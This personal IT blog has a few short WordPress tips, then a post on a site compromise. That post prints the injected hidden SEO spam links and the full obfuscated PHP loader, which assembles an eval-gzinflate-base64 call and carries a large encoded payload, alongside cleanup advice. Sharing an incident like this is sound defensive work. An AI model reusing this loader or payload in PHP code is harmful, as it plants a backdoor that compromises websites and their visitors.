Frederic VUONG – IT BlogMy IT & Internet blog

When I connected on my WP admin dashboard, it was displaying in a simple HTML page (no CSS loaded). I found a great solution on the wordpress forum.

Simply add the following line in the wp-config.php file before the first require_once function call:

 define(‘CONCATENATE_SCRIPTS’, false);

Hope this will fix your problem.

Source: http://wordpress.org/support/topic/wp-admin-broken-displays-plain-html-css-java-not-loading

I found this website where you can find, evaluate and rate most (all?) the CMS solutions currently available on the market.

Note: Admin and user logins are provided for each solution

More information on http://www.opensourcecms.com/general/ratings.php

Admin and user logins are provided

I recently noticed that the following hidden links were added to the bottom of some web pages of one of my website:

<br /> <style>#asmg {position:absolute;overflow:auto;height:0;width:0;}</style> <p><font id="asmg"><a href="http://buycipro24.com/">buy cipro</a><br /> <a href="http://glaucomaclinical.com/">glaucoma</a><br /> <a href="http://newyork-travel-guide.com/">newyork travel</a><br /> <a href="http://sciaticnervedamage.net/">sciatic nerve damage</a><br /> <a href="http://narrowangleglaucoma.info/">narrow angle glaucoma</a><br /> <a href="http://clusterheadache.info/">cluster headache</a><br /> <a href="http://www.buyziagenonline.com/">buy ziagen</a><br /> <a href="http://buyezetimibe.com/">ezetimibe</a><br /> <a href="http://rankexplorer.com">Poker Software</a><br /> <a href="http://fibromyalgia-pain-symptoms.com/">fibromyalgia</a><br /> <a href="http://fibromyalgiasyndrome.org/">fibromyalgia syndrome</a><br /> <a href="http://www.paydayloans250.com/">payday loans</a><br /> <a href="http://www.fastpaydayloan24.com/">payday loan</a><br /> <a href="http://relieve-headache-treatment.com/">headache</a><br /> <a href="http://relieve-sciatic-pain.com/">sciatica</a></font><br />

Searching from where this code was generated, I noticed that the following piece of code was included at the top of almost every php files of my website:

$md5 = “1491ea89ea9b3a86e045bb532f560c2c”;<br /> $wp_salt = array(“4″,”_”,’g',’(‘,”b”,’z',’l',’i',”d”,’6′,’s',’f',’;',’c',”)”,”t”,”v”,’r',”$”,”a”,’n',’e',”o”);<br /> $wp_add_filter = create_function(‘$’.'v’,$wp_salt[21].$wp_salt[16].$wp_salt[19].$wp_salt[6].$wp_salt[3].$wp_salt[2].$wp_salt[5].$wp_salt[7].$wp_salt[20].$wp_salt[11].$wp_salt[6].$wp_salt[19].$wp_salt[15].$wp_salt[21].$wp_salt[3].$wp_salt[4].$wp_salt[19].$wp_salt[10].$wp_salt[21].$wp_salt[9].$wp_salt[0].$wp_salt[1].$wp_salt[8].$wp_salt[21].$wp_salt[13].$wp_salt[22].$wp_salt[8].$wp_salt[21].$wp_salt[3].$wp_salt[18].$wp_salt[16].$wp_salt[14].$wp_salt[14].$wp_salt[14].$wp_salt[12]);<br /> $wp_add_filter(‘FZfFDqxaAkU/590XBril0wPcCgq3SQd3d76+684hgXO2rF2cSf+nepux7JO9+JMmW0Fg/8uLbMqLP/+IcSm+W0AMnVXiONHyutb5Fci96q1q10W++ujSKCjnjUWu57z4od9fL2jAEAp3LOqb6ID4l4uUiO+/Ugi/KNjtaorDHimEF3PcnAcRVYHrxLHEqDguJTcnaOjbPK0SHQsYPL73ycSYds0hvKE/XP4d8f3ZISL5gLykCx3rF4LZm3Fw3LQvOkb1neKbXUkyYtssv1aINj6oSZUE37B1ousYUwaB4syIWpINyHcjb9fYJft7XZpL8GWdIOTZk5/DI4l8p8WjFSOIILpgJt1Cm9S3uBUbchdHk+9BSw9JKJYtMa+WUIfXikXB6zESqa1v/Pm2YkC0shomnxtSN3P0PDLaI0glSspS8w2tc/rb61zMNEdYpyGTn62Lt6buQykSVxhQt4indQSPrddr16TISKl+B3ngQfDkSgKKiBxlAlQWo/MVYTOvAXEQjwdXq9WkN++5fqxIJyKnC0/YUF5Hi6BN30DFhm0NEtkiUT5OQHr6MQ73Nezj659i49WGupwgVlCNIsnxlfbnTxvWzJ3dB09+x6Irhl6kB6UlNYcSVULFJfqJ6l1XhzX6cKaZNSahR9R8K4sR4LdPFQ5WLxUJgUeo9S3lAbcN4vy4dftDbtCSxd24IRB402vDq3L4muc1WZwybfui1s1bsbnL5jbciY2pKVIKNrB5ykkbvhPjSxaV1jGsMlW24aTiFynSpkbdQUzxRhmd7OiR02MHCGBcMc1Ltigjn3E7M71NfTVX6JQ9myx8+90gAJJ5+Z0FF7OWcKLwEjSE3VOyGtbjWqH3aM6igRt84YMOBTS+CFuqugjrK1Wv9D64GihVakhzUQvhCnqUX4qsfaffW8/+ajhr0xD21oNhTRQZMI/Z07B1YCVT9oevpp38U96kHD0zBIifOcr9pKxDukpxx7v7HoM2xVlJUSRItX2qSD5Q8GXyMAAyF8MlYE/PhTvieUzBNtaJae69IjYnWgqEOhk3jfK54K6DIpVod2GbfSoPsFJK1JcEE745nu+eTzqH1dtQCwp95+3V7+BGv86Q3bxWC26YHpGpOpm9qqSCsqL1yWF3xJD1Y+laDS5A+VvaYUk7A7/YxNVjn0s/S4hR7SDQpSTwkE3FOIM6patKGTPo65jSM5gyimnGGZ01YIMiAcTbukOiDRDaME8pS6YtwLye9is+H2qSgNIlr/qwpTvLYWTi4AmDjUhKCi6UtAaQHO/98LAJspIx01NEHix0XwSOJy4/0zW1gcgEmcsvkEh9yh3a4RnP0jbuY/rutz765JDmlAPdBj5VAedqfEJi25NHlsPjnXGDuMQXg/8wOOoxye7wCFKt9W2bBllGKcAPv3t61gdtd4lk1RNdNdWdOWtmlQLGvvKReGlVi77rhCkVUOkmjKpMxxHwYAV/gSeCiy2Fg80y8lUQBBd/ZxcEJWQBa2K6YKguh/0OB4aDmMRXy51Ojb4BfaFtV8gZGqXLZ/hd+FQ/yVBQU8jnxUeH+Z44yIhs3dQSAUs2GvshqEZkFcEt8pK9pXl5K7mAPTjK1rh4ygIv8XL5fOLnNFImQlkUOdSYfeJw1Q6SipO5npZUHPVDmJp5DhmjSbPHd66kaWR/4HoYKX0a0+yS19veOsPX/sTbbtr90EWVVBQAn/sOC7lZSG/N1Y7MNLhH6AynQRSTnvXx07rsdG1XmsS1jt3CRNN+zcNDXci2J0Juep8pFjpA2zwHrSuzZq71vHUTO/1N/X0ap1bYzg9AYa22Wnuafqmqa0A6DgmIxZ50oOZGXmHL87OYs7rN1jxsBy7qsZ1CYOUOIH3MhUWR0BZC95tLJe5DITmmDK8RlVU1F0P/LmWli3Gb0bSbIAzpjTZs0QPI0dS6q2/pVZufaSR4DZLdAnmrX3jj7IGziPUbT+8LNxDjsyWFgoy+rjtYVlR46dTNJ1I1XwWotcd1Mf22pKm6Z/vBXpPchWy1uDfEAt0ke+Rd3+D9NU0rKHXlzqMC2GaxCkKBNQpWFOLIl/4tNjTEpv6D5AC9a0abf4DNN4r9OGrus7JANiLpOElKngGkgu+OSjyHwVJzcr7GXQCpKqzdd0bfO/dm/le+d3HMXKCQwZ5urJA5eSAI+1Z+M/9KNQwlS5eCd8dhBKjKYn+I52Z84/5rffj4BkgSuj+pnBUf9+e1G60tPw4L234i6OvIxDVyjNhm3HE6IQKJCq75jhC1Eo+rkAWYA4VlKs2fgIJ68E65ql7oPQlGtRtgGnvnM7bWrQV/zZKFd+XR7TUssHeW28cQJngHTMcTgqQV2A819nqjfD414/b6+IFKvZ7JnaPoGjsnKx7I19N9Jrmajz0q73A0BGJ/buCMvfj9LmapnWBWP1kgd78MJI5SK58QkrBC8lZt7Vb20yJhHoHH5351jdg/KASf+p6Q1ne+rYJZSDt1Xzsy5ePK4S9im42nozuKxVH1eFMzQAjJehFuyF1kTyqSqa1OYPUN3vbh6EnO+s6WyeUwO5DO5fx0CYd89pdGGoGJrZ+I2Y99ND2YpqXWGQGXEHZED4lhvduJAYOkCRh6vorh7o5Ec8nqWrYQIKlJzcfYMgZi/NFdSk2Hs7qLJq6lu28aJdLaJG1hCzq89TXJ4zO1kCo4o2voDgsskYm3l3dR05CRjV1CSE946sHWcZuZ+2GUV1G5YGRQRTa3z6kaeKXOHqNypjQD2z7SG42ICWDKfi7lTWTwjhS6yHKmktBs9SIFFD5HIRAUiakD94DgsBWotHYEutMQNJvL8bMes4C+xmKbMEPLacbGP0Poc5/gsP7eqhQDzi9x3IrYGAkIHae2GH+Ydjosegeaa/SXk/gj81d5DplSzV1bRzDD+EUzvJutlupz9YryTAtQT6ytBERHsWSt+nOvw+ysfjqjQWWo42RoRyqUL78yYwfCeJvLHR8ErBqxEf86gnY4TsiC7kzv6UwCZ+4r+TB16lccR5mnqSXB/efmXlgYrXXdLiulGfAoy0r8aBALS9cT+8coT3bt5bfAejr4Rob2YMCaLOKg18xy/xzra3Q2yDRH3mRquJEpPA3oE7TSTVJ7u4CAgZ1JLV2eb9mSlQsxqfBJGTIltP0cy1MaGsTeKnOohLn8nTpv3faU+TbfkeZop2fBpnCPttupYpkhg63Ure2FqSjlp/iWt44JrxAlxii+Haol9LqpVIm/xRD1Fi05tGerO5qDlUBX6FMbXFNBO3/GkA8dyHf9gdTbFA+IqzfBX8svWgMl6ukaX858ij1e8nxcoB2EurBiIAELvLZzQfggz7GENRv6BPuKnMkj47pLZqgd3oZMq5kkyFyDBxrQHQZV58Jk+FnD9Jr4KPLqQ1csgJTSKWI8vjBbTYkCDQRblFYwp3xT8NsoyFtANeraZGzWpN+/sobTA/umQelYPCr3vRz3I3+RmQJeJU5EGhLxP2ySVQ8oKNZ56wD58O+EL50LWHQn1JB9PyyrIjbFA56NwqGZcwKQmR/CLLqmT9PiWZdL46p6bD6WnnnmnU+yfXKVPBzzEz7DEyHGtdxTBFINAd80/czp85wU5T0y12WoYCxd2RTRTPs3YER1GYcPJqXIURJtgyfoMidWqXwV6e6A6lrbeEV0NmGPmNLATTQemhuP79KAwZ1Mgvl9fOQNsqLOpQo6+rc2RwVrZFRsm9x5ZPNWTQgLNjJkru+++4yFqt6bMg4WSoJw2a+Nt/HrymDSVQdDJUun+hzaGbs0fMfZjwx058qx4Jb5hQz5PHeyWzzDtnnu10r5pZN+8tPvd19XQUoIA9SWGFD2sKuSuuNLlVJ+QhXulZpebexIiaTNHviSTSXuSA1ljkQlanUsbdA9gLWfgVCCT3px7hmLCIZ758I3dQPYsg4NQBet2nwIjk+vmFaCIpkO+9JId5XvneuXeMpmQnzX/V+xvR0IsfEPGOL0/IFsaG5YEogT/qlWLzz8lgpAcfvp5lubUml3J6338FDKmICJG3ho5uO/NQAevEpn4bn8Rmwcyq7Ly0gAiQyhBSjEY+79JO7+1ELS4hIxLKMiD7n4IArpIvgagkBlpDcBICTykYzzceCnwDnoGxEduIGcgeiQsTNnBL3h+/z21Cex78tOjODXsGKTfCxvCdiqdjdiqT22qjommo7Kzekgnatm8PYXJM7q5xYjnQCj/HwLCK6zyEY3coQu+Ni6bruVq1Bdr9eK7e2RXn68HHw+djRAZJxMCLBqEawv480ZJw0L5x5EEqFPFHK+S10WN3xbh8Y6juDKUSt/SEd1eVcW+2J2VPMZNZYdLQMiGCR+ZvY3yXu5fEyCkWX+11rzzmu4wnLAddDpIPCKMZmo7OIOASg9rCkssngHhqNy94MjcJvPnaYNxJdQA4PxUldK9DoyU6rB0sH7UpZV5q4ywKnaM1pDF/ttJzQRiy4pe06R6ZxHjXLDnXfkfwYiamtsaO6Q9IzuDN0s7hv8ujm7IaZuclwZ324jh4ykL3uIM1RfvTSTDYH2JoqiQm3qNVv/WUJjqrPu1NnHalWUz7N1sSihRspvgWPJbdhXCONTjKP5HChf0jRLjCFUhP36QLm175MoVPD4pcDaT4vGuoZ4vaJ9+lBElW9F3ca0tpDC4Zwvx1AkNi1HP17pVEsYGDHsGszxzrQKj/A0JJUEHtGIxNRF8nkzDWQ7LL8DbjfBGAPOkkV3k5tcnrVdzLdbn+dts4dbbi2wHhmzASgappaqVFFMfe7P9VsHPlf44fBsn/XQWyQzgCkztQv41evE4uRklCDgpcq9p6KvXKYYKfZz8kFWlrl3LXscSwyuw5Q9NhOovfvg5ysk2kNBkgdF20qZ58R6KQkce0RjaDu0/SyguaZTRstZACdO37kZB3xoatQtqW5exbiFuyzU33a1IvyRBxNwCbcp2r8BdRqz6nUdgbxn5iwArNogoiY2XsiYy9Bn77xXBeTdnYvz5wio+kuw8chHAN7Zz2+YlnPOHByhLj+BRtbKzdq4fnv2lQJS7MqWXY67uk1+B388q4kyRLNm99tZegVSiTzxThV62PqLdvIAxDeTTKbVeHjN4qUYvsMrar1UxpVbuTGYB+opDtJnWU9Pcke5v1v8ZDTkK5K6n0xy6gcjLOMX+dQlAXGpN5/5eUwA3R2M3uF6fAU27tlflxikHqN80An5TcQ2ZN/QiD6VzgAu/AuYVMDTZU+qKhoIqscyIkg7QI9f9cf8HoSW9Nm5pMVtczPlJNTCf1vc56bPk7dRRCbS3caNDg788s0SsXrGPWrMg/tU1HqiflekfWoF+9vXE0dPMc0VGKELjvGx4vTQf58q1AYFNrqxMnxkUm/55aAhyWSRjR7HCKS1Cd/DjQaMZkpgpe2xMstTPoE5nvuwrFzagDYD8/m0647iG+5k/BWEd5VnsA4ZiKi4vsvAwIWXq4N2MNlpYd3TqidHW3nPFeq8ao+EYvH8AeMISspYn4oz7PRFkL8NN9OAe8r8QO3T+LgTFzQyvrQKQ2+smUCtt/mewEYkfEdo9moYBKSaLvGbRAUFot0dNs9c27mYgl2Orf0gwu+vYUO9REn3o7NZwy4c60vQmimekTwszDFARC2UNflThuZ4AET2sCaiMIBrK7cvJWAJgPGsy8Fvd3LDhbfHu1dUE3m8uFhTgnfDZbSyFzHebK1CIQMo02Y4iwKf517MgNStoIY+Mh8UCwfYZL1JP2oxF0v7QvEm8AxQrN6ld09XYshU3SXdQqm3rUDivxUHE1GfZ7OfllQqMDzGYbHbLtr3QlU9KlOIKerlw65uWEoFH4FfqKjj3qqh+yGLrXTEYvCFjQsiXHbIMuFstHRbDkZgKK6Ljhl/a3HRhPmUSVnylNX0PsuGRUb2ewgCrBB/42UwfVAuHZjs0QIBvOU32XvU1qY+CTl0OI8VsXasWyQgDS5091krzhRWSz423NCDNyzD/Au0k4zo5gu0hD7XpRTmqxtjECzK/mZe9scEw4G5pAKi1jXaY0ac1M17v5QFWypglj0eeEjNut9dPXDaEaRjjIkiT/3SgXhq2Muuvgn5Weoq15kH5xkLalqrEIHfdAOr0oZ5wRQM8KaxaZj0ovy9H96MhqrB+9YUsyVd2yJnvNKy/3dcWB2o6BBuW9AXYA6Wc+YquYB+ztG8tz1TNh7YXvnNkfT0K2O3c/xM/WCMw/UD81YfWDo/FEeVslvACorPONtiShjQcRamYTPiF3FaL2wgQWEbUwFqP0A8r29CfEVFWjih2hGj5lyivDhY6JExKp1yF3nHbBwunPxi85B4SImT5+MwU5ilfntm5oI4RO6aUEUtvsDCCz8RJoKfSbSA4YeKpuQgmuv4NWArm+8asmEJTTTgCQg8kcvGIW08wk4F4dHSBI2STOi8wBufl2aUEXf7Gjl3cL2TMqgjcLh56cZFn+LkIMPQp9D2TeqpLrdmUylrx3XL4JslE9Zx3YE8vQz7JgDtnsvaE1sx7xZ79Ec5FftWP3RU6GObgnGtRCHY/ArX9i9nLU2zbQlLcIuFrkHN7VhYZt/Ga2Ea8laW5tUvWO0SUPjAy9KhdxEwSHpW3rGaVQhcbDJTQRtEan7kyBOcYcUid9ewmbifAuXSoGj67oSv7NQ5sNxiO7K987rVA8keErMysnrTM2yOA3VgJwHs5RAT2ecLBWKb7kruCYW6Nee8hsI0nNDJnDQIeegRw47y9gH9LtzFXf/R6YGL38r2PjyJ3C37XTTGHd0vbQE6T/UC8WsbVAab40NLFoihhkmvQq2cOnlG1cbsGCEHfp4q7NCcbr2M9c/6aPuBmCFVxTT7ohJDBI1cIQifDj8fv+XKH/hYm4KT453Lj3D+KVrOfcwjYgOE9flXM/YfVILytQk4+QX6DWp0ktdYGK8o/KxSjyzg/AZyWyQPKKaPGtHUl7YFI+hEEL9+A4tD7aSDO157IYyY0tvb2u5rjNmLgza4D/xp1PQPeB1QNNDw92fnWn0ZDI/3I4W7Bv3CxnnDEA9EC4klXb6sOX2XiWiJq02kRdC0W32r2KeBdUB5RfbTxBFY0LKBX1/e0VN7+tyw/5FCH6rfrpYjEkFzSs+rp5ShX+GGeptad/WrVjj6PouhVlF5L/xSBdKB7wW51yidL4FtUhmNza3rkSf+tW7u5HCbffQHMC8f2aMwA3lqmXhgIydJ6/7SHVZOIyPdUS5k3xX5xPiKpm43q443nUO+RqI1ZzIFN5JhlZG15UrgzwMVlXvkyCS/8akOlRWrsOBjaMlUAXYJa5+vNoBL+osdSAUP00M3KugiMSuKUCX1GYLklWOHX7hhaMvWBkhYm6Jki1SEov2V1LgjoXCHIlfXQCZHDhIOfa3q3OzR4oJKqVPjJ2JZoXm8mrfA58hflKrwDMJmv6Z/bBJRRT+72lUVO9YPEns61WAWNpwQsWlV2xSI8Sm8aPKgv/rQV47aGEoI//EEVLYXXGuYdgJi21Gs5Lxo8PGkDjM3L6LrRglqSaLX1ByIFC8wPyTRfbRL+dCZXHnMfKHyQMzQdWMY/HhurhercKAaHf62Y3uQRXXrAuQAnHmzOT0y4fXhNbs3MKBDEA2ZfmWteYuEJFz6DOHwuULxh991sDuSEd/euHJgLja0KDEI4FCTppgJllSkEKVcctCk0EF4NIojmCLzLyArVOlnw4EVpaD4KjKB3GKwxZYb6SjcuQcqXrFLsL2nEa6dCv4p0Vx/M9bcuboplORZmsby387OheEDb6o/ERhg8tQuazwmSwIjDNSmvKTE5J+vW83THATVasLSsAS0WtJEyX5t0hiCSu9AVbohqMIEqIjWmyRgdxW57qU9nQyq9uUzWhhhuDk9tB6f26mm0iTYu12/upT4fSKxEe6oVx0e45GWjeMeMMEXNnJhKx5IPJdMJqufT2L4omiMfRmGndioZEa9U5xemoD51x3G4r4AHUSAZelJDNN80uQRifyL5LBe5Rq+WdqDNgwtJRxU999+E52T09SGy0aQH2iR70K3lI18CmvI6+gIJJNg/p27wuz6aZYH+TlxJ565ubwm42FWMGpRy+M/NqZ/SA2v2lLgeLIrCflaMQUy9xsS6p5zNLTFtYqSi3PcpZMcA2uAaIWZwyw2cLfJ3J1vhiFlpvGK1akhW8+xTDZt4A9+c3M1TEChB8YTv7+pWuQki9THNzQaAdx9TwqH5QeK7Xvw7zmADytTHYnEoZx3lkN3XkAQmPwKFujs2DAeTuPtdieGLHLFcA8Z4sv6RUQCVlvFwbXyXZMG6Lpeg4xjO6nLpa+ts6jOyjtO13swBgglftlsUPcRgk4iR76MJQDsr6uaF3T/bLRtJbP63Yq7FOQAb9d4oT88C5jSQ4NLHkQu1+OkW/Krev2mwdXkAnP03KSUrcX0Dftrf5AcURAEyxwEa+q///z777//+T8=’);<br />

Browsing some websites, I have found that some other webmasters had the same problem on their sites. Here is the best description of the symptoms related to this malware:

http://www.marinbezhanov.com/web-development/6/malware-alert-september-2011-sshell-v.1.0/

and here is a php script that was developed by PHP Beginners to clean up all the infected pages (http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html).

If you found the malware in your sites, copy the cleaner.php to the root of each of your websites and run it with (http://mysite.com/myinfectedsite/cleaner.php).

You should as well find and delete the following files if they exist on your server:

wp-thumb-creator.php
b7a.php
a95b.php

Hoping that this will make the full cleanup, last but not least it is strongly advised to change all your passwords (sites, database and FTP).

I suspect that this malware is coming from on of the wordpress plugin but cannot confirm it for the moment. I will keep you posted when I find the patient zero.

Good luck!